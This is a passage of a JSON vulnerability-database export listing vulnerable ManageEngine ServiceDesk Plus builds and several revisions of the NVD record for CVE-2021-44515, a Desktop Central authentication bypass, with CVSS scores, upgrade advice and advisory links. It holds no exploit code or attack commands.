{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11135:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11136:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11137:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11138:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11139:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11140:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11141:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11142:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11143:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11144:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11201:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11202:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11203:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11204:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:-:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11306:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11307:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11308:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11309:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12000:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12001:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:12.0:12002:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.manageengine.com/products/service-desk/on-premises/readme.html#12003", "name": "https://www.manageengine.com/products/service-desk/on-premises/readme.html#12003", "refsource": "MISC", "tags": ["Vendor Advisory"]}], "_object_type": "robots.models.cve.CveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.cve.CveBulletin"]}, {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T08:25:39", "history": [{"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "5538f54780901992b106b7affd3599fbf843f49c3bb8c5a2c9077a3e68191ea2", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-12T05:15:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-12T08:36:39", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"modified": "2021-12-12T08:36:39", "references": [{"idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"], "type": "thn"}, {"idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"], "type": "cisa"}, {"idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"], "type": "hivepro"}, {"idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"], "type": "nessus"}], "rev": 2}, "exploitation": {"modified": "2021-12-12T08:36:39", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"], "type": "attackerkb"}]}, "score": {"modified": "2021-12-12T08:36:39", "rev": 2, "value": 2.7, "vector": "NONE"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": [], "url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp"}, {"name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": [], "url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"}]}, "lastseen": "2021-12-12T08:36:39", "differentElements": ["modified"], "edition": 1}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-14T08:36:42", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-14T08:36:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": [], "url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": [], "url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp"}, {"name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": [], "url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"}]}, "lastseen": "2021-12-14T08:36:42", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 2}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T17:55:31", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-14T08:36:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T17:55:31", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 3}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T17:55:36", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-14T08:36:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": 